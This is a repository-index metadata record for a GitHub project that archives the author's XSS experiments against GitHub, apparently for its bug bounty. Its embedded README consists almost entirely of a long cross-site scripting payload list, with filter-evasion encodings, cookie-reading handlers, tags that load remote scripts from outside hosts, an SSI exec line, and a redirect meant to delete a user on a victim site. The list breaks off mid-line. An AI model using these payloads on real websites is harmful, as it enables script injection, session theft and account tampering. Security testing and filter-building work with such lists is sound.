{"id":25171608,"url":"https://github.com/basemax/githubvulnerabilityxss","last_synced_at":"2026-04-24T20:33:07.339Z","repository":{"id":151535385,"uuid":"268298561","full_name":"BaseMax/GitHubVulnerabilityXSS","owner":"BaseMax","description":"Archive of my experiments related to checking the security of GitHub and XSS vulnerability.","archived":false,"fork":false,"pushed_at":"2020-05-31T19:21:40.000Z","size":2059,"stargazers_count":3,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-10-25T11:57:28.135Z","etag":null,"topics":["github","github-xss","xss","xss-attacks","xss-github","xss-injection","xss-vulnerability"],"latest_commit_sha":null,"homepage":"https://bounty.github.com","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BaseMax.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2020-05-31T14:36:25.000Z","updated_at":"2020-06-25T00:44:40.000Z","dependencies_parsed_at":null,"dependency_job_id":"e593fc33-8d7e-4da1-87d0-ab4832c490b1","html_url":"https://github.com/BaseMax/GitHubVulnerabilityXSS","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/BaseMax/GitHubVulnerabilityXSS","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BaseMax%2FGitHubVulnerabilityXSS","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BaseMax%2FGitHubVulnerabilityXSS/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BaseMax%2FGitHubVulnerabilityXSS/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BaseMax%2FGitHubVulnerabilityXSS/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BaseMax","download_url":"https://codeload.github.com/BaseMax/GitHubVulnerabilityXSS/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BaseMax%2FGitHubVulnerabilityXSS/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32239721,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-24T13:21:15.438Z","status":"ssl_error","status_checked_at":"2026-04-24T13:21:15.005Z","response_time":64,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["github","github-xss","xss","xss-attacks","xss-github","xss-injection","xss-vulnerability"],"created_at":"2025-02-09T09:21:20.823Z","updated_at":"2026-04-24T20:33:07.328Z","avatar_url":"https://github.com/BaseMax.png","language":"PHP","readme":"# GitHub Vulnerability XSS\n\nArchive of my experiments related to checking the security of GitHub and XSS vulnerability.\n\nWhile there has been no security problem with **GitHub** for a long time.\n\nI thought I'd personally check the security of the **GitHub**, maybe find something, or even not.\n\nhttps://bounty.github.com/\n\n### Commands\n\n#### SVG\n\n**A fantastic note:** Our code `\u003cimg src=\"https://service.asrez.com/svg.php\"\u003e` will replace to `\u003cimg src=\"https://camo.githubusercontent.com/d4491f1087c5b5862efa1e6bbe542e5a42e2ee28/68747470733a2f2f736572766963652e617372657a2e636f6d2f7376672e706870\"\u003e`\n\nThey change `content-type` header in new file.\n\n\u003cimg src=\"https://service.asrez.com/svg.php\"\u003e\n\n```\njavascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'\u003e\n\\\u003ca onmouseover=\"alert(document.cookie)\"\\\u003exxs link\\\u003c/a\\\u003e\n\\\u003ca onmouseover=alert(document.cookie)\\\u003exxs link\\\u003c/a\\\u003e\n\u003cIMG \"\"\"\u003e\u003cSCRIPT\u003ealert(\"XSS\")\u003c/SCRIPT\u003e\"\\\u003e\n\u003cimg src=x onerror=\"\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\"\u003e\n\u003cSCRIPT/XSS SRC=\"http://xss.rocks/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT/SRC=\"http://xss.rocks/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003c\u003cSCRIPT\u003ealert(\"XSS\");//\\\u003c\u003c/SCRIPT\u003e\n\u003cSCRIPT SRC=http://xss.rocks/xss.js?\u003c B \u003e\n\u003cSCRIPT SRC=//xss.rocks/.j\u003e\n\u003cIMG SRC=\"`\u003cjavascript:alert\u003e`('XSS')\"\n\u003csvg/onload=alert('XSS')\u003e\nSet.constructor`alert\\x28document.domain\\x29```\n\u003cLINK REL=\"stylesheet\" HREF=\"http://xss.rocks/xss.css\"\u003e\n\u003cSTYLE\u003e@import'http://xss.rocks/xss.css';\u003c/STYLE\u003e\n\u003cMETA HTTP-EQUIV=\"Link\" Content=\"\u003chttp://xss.rocks/xss.css\u003e; REL=stylesheet\"\u003e\n\u003cSTYLE\u003eBODY{-moz-binding:url(\"http://xss.rocks/xssmoz.xml#xss\")}\u003c/STYLE\u003e\n\u003cSTYLE type=\"text/css\"\u003eBODY{background:url(\"\u003cjavascript:alert\u003e('XSS')\")}\u003c/STYLE\u003e\n\u003cimg src=\"https://service.asrez.com/svg.php\"\u003e\n\u003cIMG SRC=\"jav    ascript:javascript:alert(1);\"\u003e\n\u003cA HREF=\"htt\tp://6\t6.000146.0x7.147/\"\u003eXSS\u003c/A\u003e\n‘; alert(1);\n‘)alert(1);//\n\u003cScRiPt\u003ealert(1)\u003c/sCriPt\u003e\n\u003cIMG SRC=jAVasCrIPt:alert(‘XSS’)\u003e\n\u003cIMG SRC=”javascript:alert(‘XSS’);”\u003e\n\u003cIMG SRC=javascript:alert(‘XSS’)\u003e\n\u003ciframe %00 src=\"\u0026Tab;javascript:prompt(1)\u0026Tab;\"%00\u003e\n\u003csVg\u003e\u003cscRipt %00\u003ealert\u0026lpar;1\u0026rpar; {Opera}\n\u003cimg/src=`%00` onerror=this.onerror=confirm(1)\n\u003cimg src=`%00`\u0026NewLine; onerror=alert(1)\u0026NewLine;\n\u003cscript /*%00*/\u003e/*%00*/alert(1)/*%00*/\u003c/script /*%00*/\n\u0026#34;\u0026#62;\u003ch1/onmouseover='\\u0061lert(1)'\u003e%00\n\u003c/script\u003e\u003cimg/*%00/src=\"worksinchrome\u0026colon;prompt\u0026#x28;1\u0026#x29;\"/%00*/onerror='eval(src)'\u003e\n\u003ciframe/%00/ src=javaSCRIPT\u0026colon;alert(1)\n\u003ciframe style=\"xg-p:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\"\u003e\n\u003cdiv style=\"xg-p:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\" onclick=\"alert(1)\"\u003ex\u003c/button\u003e\n‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–\u003e\u003c/SCRIPT\u003e”\u003e’\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\n\u003cIMG “””\u003e\u003cSCRIPT\u003ealert(“XSS”)\u003c/SCRIPT\u003e”\u003e\n\u003cIMG SRC=”jav ascript:alert(‘XSS’);”\u003e\n\u003cIMG SRC=”jav\u0026#x09;ascript:alert(‘XSS’);”\u003e\n\u003c\u003cSCRIPT\u003ealert(“XSS”);//\u003c\u003c/SCRIPT\u003e\n\u003cBODY BACKGROUND=”javascript:alert(‘XSS’)”\u003e\n\u003cBODY ONLOAD=alert(‘XSS’)\u003e\n\u003cINPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”\u003e\n\u003cIMG SRC=”javascript:alert(‘XSS’)”\njavascript:alert(\"hellox worldss\")\n\u003cimg src=\"javascript:alert('XSS');\"\u003e\n\u003cimg src=javascript:alert(\u0026quot;XSS\u0026quot;)\u003e\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"\u003e\n\u003c\"';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\n';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c?/SCRIPT\u003e\u0026submit.x=27\u0026submit.y=9\u0026cmd=search\n\u003cscript\u003ealert(\"hellox worldss\")\u003c/script\u003e\u0026safe=high\u0026cx=006665157904466893121:su_tzknyxug\u0026cof=FORID:9#510\n\u003cscript\u003ealert(\"XSS\");\u003c/script\u003e\u0026search=1\n0\u0026q=';alert(String.fromCharCode(88,83,83))//\\';alert%2?8String.fromCharCode(88,83,83))//\";alert(String.fromCharCode?(88,83,83))//\\\";alert(String.fromCharCode(88,83,83)%?29//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83%?2C83))\u003c/SCRIPT\u003e\u0026submit-frmGoogleWeb=Web+Search\n\u003ch1\u003e\u003cfont color=blue\u003ehellox worldss\u003c/h1\u003e\n\u003cBODY ONLOAD=alert('hellox worldss')\u003e\n\u003cinput onfocus=write(XSS) autofocus\u003e\n\u003cinput onblur=write(XSS) autofocus\u003e\u003cinput autofocus\u003e\n\u003cbody onscroll=alert(XSS)\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e...\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cinput autofocus\u003e\n\u003cform\u003e\u003cbutton formaction=\"javascript:alert(XSS)\"\u003elol\n\u003c!--\u003cimg src=\"--\u003e\u003cimg src=x onerror=alert(XSS)//\"\u003e\n\u003c![\u003e\u003cimg src=\"]\u003e\u003cimg src=x onerror=alert(XSS)//\"\u003e\n\u003cstyle\u003e\u003cimg src=\"\u003c/style\u003e\u003cimg src=x onerror=alert(XSS)//\"\u003e\n\u003c? foo=\"\u003e\u003cx foo='?\u003e\u003cscript\u003ealert(1)\u003c/script\u003e'\u003e\"\u003e\n\u003c! foo=\"[[[Inception]]\"\u003e\u003cx foo=\"]foo\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\n\u003c% foo\u003e\u003cx foo=\"%\u003e\u003cscript\u003ealert(123)\u003c/script\u003e\"\u003e\n\u003cdiv style=\"font-family:'foo\u0026#10;;color:red;';\"\u003eLOL\nLOL\u003cstyle\u003e*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}\u003c/style\u003e\n\u003cscript\u003e({0:#0=alert/#0#/#0#(0)})\u003c/script\u003e\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\"\u003eLOL\u003cscript\u003ealert(123)\u003c/script\u003e\u003c/svg\u003e\n\u0026lt;SCRIPT\u0026gt;alert(/XSS/\u0026#46;source)\u0026lt;/SCRIPT\u0026gt;\n\\\\\";alert('XSS');//\n\u0026lt;/TITLE\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(\\\"XSS\\\");\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;BODY BACKGROUND=\\\"javascript\u0026#058;alert('XSS')\\\"\u0026gt;\n\u0026lt;BODY ONLOAD=alert('XSS')\u0026gt;\n\u0026lt;IMG DYNSRC=\\\"javascript\u0026#058;alert('XSS')\\\"\u0026gt;\n\u0026lt;IMG LOWSRC=\\\"javascript\u0026#058;alert('XSS')\\\"\u0026gt;\n\u0026lt;BGSOUND SRC=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;BR SIZE=\\\"\u0026{alert('XSS')}\\\"\u0026gt;\n\u0026lt;LAYER SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/scriptlet\u0026#46;html\\\"\u0026gt;\u0026lt;/LAYER\u0026gt;\n\u0026lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;css\\\"\u0026gt;\n\u0026lt;STYLE\u0026gt;@import'http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;css';\u0026lt;/STYLE\u0026gt;\n\u0026lt;META HTTP-EQUIV=\\\"Link\\\" Content=\\\"\u0026lt;http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;css\u0026gt;; REL=stylesheet\\\"\u0026gt;\n\u0026lt;STYLE\u0026gt;BODY{-moz-binding\u0026#58;url(\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xssmoz\u0026#46;xml#xss\\\")}\u0026lt;/STYLE\u0026gt;\n\u0026lt;XSS STYLE=\\\"behavior\u0026#58; url(xss\u0026#46;htc);\\\"\u0026gt;\n\u0026lt;STYLE\u0026gt;li {list-style-image\u0026#58; url(\\\"javascript\u0026#058;alert('XSS')\\\");}\u0026lt;/STYLE\u0026gt;\u0026lt;UL\u0026gt;\u0026lt;LI\u0026gt;XSS\n\u0026lt;IMG SRC='vbscript\u0026#058;msgbox(\\\"XSS\\\")'\u0026gt;\n\u0026lt;IMG SRC=\\\"mocha\u0026#58;\u0026#91;code\u0026#93;\\\"\u0026gt;\n\u0026lt;IMG SRC=\\\"livescript\u0026#058;\u0026#91;code\u0026#93;\\\"\u0026gt;\nžscriptualert(EXSSE)ž/scriptu\n\u0026lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=data\u0026#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\"\u0026gt;\n\u0026lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http\u0026#58;//;URL=javascript\u0026#058;alert('XSS');\\\"\n\u0026lt;IFRAME SRC=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\u0026lt;/IFRAME\u0026gt;\n\u0026lt;FRAMESET\u0026gt;\u0026lt;FRAME SRC=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\u0026lt;/FRAMESET\u0026gt;\n\u0026lt;TABLE BACKGROUND=\\\"javascript\u0026#058;alert('XSS')\\\"\u0026gt;\n\u0026lt;TABLE\u0026gt;\u0026lt;TD BACKGROUND=\\\"javascript\u0026#058;alert('XSS')\\\"\u0026gt;\n\u0026lt;DIV STYLE=\\\"background-image\u0026#58;\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028\u0026#46;1027\\0058\u0026#46;1053\\0053\\0027\\0029'\\0029\\\"\u0026gt;\n\u0026lt;DIV STYLE=\\\"background-image\u0026#58; url(javascript\u0026#058;alert('XSS'))\\\"\u0026gt;\n\u0026lt;DIV STYLE=\\\"width\u0026#58; expression(alert('XSS'));\\\"\u0026gt;\n\u0026lt;STYLE\u0026gt;@im\\port'\\ja\\vasc\\ript\u0026#58;alert(\\\"XSS\\\")';\u0026lt;/STYLE\u0026gt;\n\u0026lt;IMG STYLE=\\\"xss\u0026#58;expr/*XSS*/ession(alert('XSS'))\\\"\u0026gt;\n\u0026lt;XSS STYLE=\\\"xss\u0026#58;expression(alert('XSS'))\\\"\u0026gt;\nexp/*\u0026lt;A STYLE='no\\xss\u0026#58;noxss(\\\"*//*\\\");\nxss\u0026#58;ex\u0026#x2F;*XSS*//*/*/pression(alert(\\\"XSS\\\"))'\u0026gt;\n\u0026lt;STYLE TYPE=\\\"text/javascript\\\"\u0026gt;alert('XSS');\u0026lt;/STYLE\u0026gt;\n\u0026lt;STYLE\u0026gt;\u0026#46;XSS{background-image\u0026#58;url(\\\"javascript\u0026#058;alert('XSS')\\\");}\u0026lt;/STYLE\u0026gt;\u0026lt;A CLASS=XSS\u0026gt;\u0026lt;/A\u0026gt;\n\u0026lt;STYLE type=\\\"text/css\\\"\u0026gt;BODY{background\u0026#58;url(\\\"javascript\u0026#058;alert('XSS')\\\")}\u0026lt;/STYLE\u0026gt;\n\u0026lt;!--\u0026#91;if gte IE 4\u0026#93;\u0026gt;\n\u0026lt;SCRIPT\u0026gt;alert('XSS');\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;!\u0026#91;endif\u0026#93;--\u0026gt;\n\u0026lt;BASE HREF=\\\"javascript\u0026#058;alert('XSS');//\\\"\u0026gt;\n\u0026lt;OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/scriptlet\u0026#46;html\\\"\u0026gt;\u0026lt;/OBJECT\u0026gt;\n\u0026lt;OBJECT classid=clsid\u0026#58;ae24fdae-03c6-11d1-8b76-0080c744f389\u0026gt;\u0026lt;param name=url value=javascript\u0026#058;alert('XSS')\u0026gt;\u0026lt;/OBJECT\u0026gt;\n\u0026lt;EMBED SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;swf\\\" AllowScriptAccess=\\\"always\\\"\u0026gt;\u0026lt;/EMBED\u0026gt;\n\u0026lt;EMBED SRC=\\\"data\u0026#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"\u0026gt;\u0026lt;/EMBED\u0026gt;\na=\\\"get\\\";\nb=\\\"URL(\\\\\"\\\";\nc=\\\"javascript\u0026#058;\\\";\nd=\\\"alert('XSS');\\\\\")\\\";\neval(a+b+c+d);\n\u0026lt;HTML xmlns\u0026#58;xss\u0026gt;\u0026lt;?import namespace=\\\"xss\\\" implementation=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;htc\\\"\u0026gt;\u0026lt;xss\u0026#58;xss\u0026gt;XSS\u0026lt;/xss\u0026#58;xss\u0026gt;\u0026lt;/HTML\u0026gt;\n\u0026lt;XML ID=I\u0026gt;\u0026lt;X\u0026gt;\u0026lt;C\u0026gt;\u0026lt;!\u0026#91;CDATA\u0026#91;\u0026lt;IMG SRC=\\\"javas\u0026#93;\u0026#93;\u0026gt;\u0026lt;!\u0026#91;CDATA\u0026#91;cript\u0026#58;alert('XSS');\\\"\u0026gt;\u0026#93;\u0026#93;\u0026gt;\n\u0026lt;/C\u0026gt;\u0026lt;/X\u0026gt;\u0026lt;/xml\u0026gt;\u0026lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML\u0026gt;\u0026lt;/SPAN\u0026gt;\n\u0026lt;XML ID=\\\"xss\\\"\u0026gt;\u0026lt;I\u0026gt;\u0026lt;B\u0026gt;\u0026lt;IMG SRC=\\\"javas\u0026lt;!-- --\u0026gt;cript\u0026#58;alert('XSS')\\\"\u0026gt;\u0026lt;/B\u0026gt;\u0026lt;/I\u0026gt;\u0026lt;/XML\u0026gt;\n\u0026lt;SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"\u0026gt;\u0026lt;/SPAN\u0026gt;\n\u0026lt;XML SRC=\\\"xsstest\u0026#46;xml\\\" ID=I\u0026gt;\u0026lt;/XML\u0026gt;\n\u0026lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML\u0026gt;\u0026lt;/SPAN\u0026gt;\n\u0026lt;?xml\u0026#58;namespace prefix=\\\"t\\\" ns=\\\"urn\u0026#58;schemas-microsoft-com\u0026#58;time\\\"\u0026gt;\n\u0026lt;?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"\u0026gt;\n\u0026lt;t\u0026#58;set attributeName=\\\"innerHTML\\\" to=\\\"XSS\u0026lt;SCRIPT DEFER\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/SCRIPT\u0026gt;\\\"\u0026gt;\n\u0026lt;/BODY\u0026gt;\u0026lt;/HTML\u0026gt;\n\u0026lt;SCRIPT SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;jpg\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;!--#exec cmd=\\\"/bin/echo '\u0026lt;SCR'\\\"--\u0026gt;\u0026lt;!--#exec cmd=\\\"/bin/echo 'IPT SRC=http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\u0026gt;\u0026lt;/SCRIPT\u0026gt;'\\\"--\u0026gt;\n\u0026lt;? echo('\u0026lt;SCR)';\necho('IPT\u0026gt;alert(\\\"XSS\\\")\u0026lt;/SCRIPT\u0026gt;'); ?\u0026gt;\n\u0026lt;IMG SRC=\\\"http\u0026#58;//www\u0026#46;thesiteyouareon\u0026#46;com/somecommand\u0026#46;php?somevariables=maliciouscode\\\"\u0026gt;\nRedirect 302 /a\u0026#46;jpg http\u0026#58;//victimsite\u0026#46;com/admin\u0026#46;asp\u0026deleteuser\n\u0026lt;META HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=\u0026lt;SCRIPT\u0026gt;alert('XSS')\u0026lt;/SCRIPT\u0026gt;\\\"\u0026gt;\n\u0026lt;HEAD\u0026gt;\u0026lt;META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"\u0026gt; \u0026lt;/HEAD\u0026gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\n\u0026lt;SCRIPT a=\\\"\u0026gt;\\\" SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT =\\\"\u0026gt;\\\" SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT a=\\\"\u0026gt;\\\" '' SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT \\\"a='\u0026gt;'\\\" SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT a=`\u0026gt;` SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT a=\\\"\u0026gt;'\u0026gt;\\\" SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT\u0026gt;document\u0026#46;write(\\\"\u0026lt;SCRI\\\");\u0026lt;/SCRIPT\u0026gt;PT SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//66\u0026#46;102\u0026#46;7\u0026#46;147/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//1113982867/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//0x42\u0026#46;0x0000066\u0026#46;0x7\u0026#46;0x93/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//0102\u0026#46;0146\u0026#46;0007\u0026#46;00000223/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"htt p\u0026#58;//6 6\u0026#46;000146\u0026#46;0x7\u0026#46;147/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"//www\u0026#46;google\u0026#46;com/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"//google\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org@google\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//google\u0026#58;ha\u0026#46;ckers\u0026#46;org\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//google\u0026#46;com/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//www\u0026#46;google\u0026#46;com\u0026#46;/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"javascript\u0026#058;document\u0026#46;location='http\u0026#58;//www\u0026#46;google\u0026#46;com/'\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//www\u0026#46;gohttp\u0026#58;//www\u0026#46;google\u0026#46;com/ogle\u0026#46;com/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n%3C\n\u0026lt\n\u0026LT\n\u0026LT;\n\u0026#60\n\u0026#060\n\u0026#0060\n\u0026#00060\n\u0026#000060\n\u0026#0000060\n\u0026lt;\n\u0026#x3c\n\u0026#x03c\n\u0026#x003c\n\u0026#x0003c\n\u0026#x00003c\n\u0026#x000003c\n\u0026#x3c;\n\u0026#x03c;\n\u0026#x003c;\n\u0026#x0003c;\n\u0026#x00003c;\n\u0026#x000003c;\n\u0026#X3c\n\u0026#X03c\n\u0026#X003c\n\u0026#X0003c\n\u0026#X00003c\n\u0026#X000003c\n\u0026#X3c;\n\u0026#X03c;\n\u0026#X003c;\n\u0026#X0003c;\n\u0026#X00003c;\n\u0026#X000003c;\n\u0026#x3C\n\u0026#x03C\n\u0026#x003C\n\u0026#x0003C\n\u0026#x00003C\n\u0026#x000003C\n\u0026#x3C;\n\u0026#x03C;\n\u0026#x003C;\n\u0026#x0003C;\n\u0026#x00003C;\n\u0026#x000003C;\n\u0026#X3C\n\u0026#X03C\n\u0026#X003C\n\u0026#X0003C\n\u0026#X00003C\n\u0026#X000003C\n\u0026#X3C;\n\u0026#X03C;\n\u0026#X003C;\n\u0026#X0003C;\n\u0026#X00003C;\n\u0026#X000003C;\n\\x3c\n\\x3C\n\\u003c\n\\u003C\n\u0026lt;iframe src=http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/scriptlet\u0026#46;html\u0026gt;\n\u0026lt;IMG SRC=\\\"javascript\u0026#058;alert('XSS')\\\"\n\u0026lt;SCRIPT SRC=//ha\u0026#46;ckers\u0026#46;org/\u0026#46;js\u0026gt;\n\u0026lt;SCRIPT 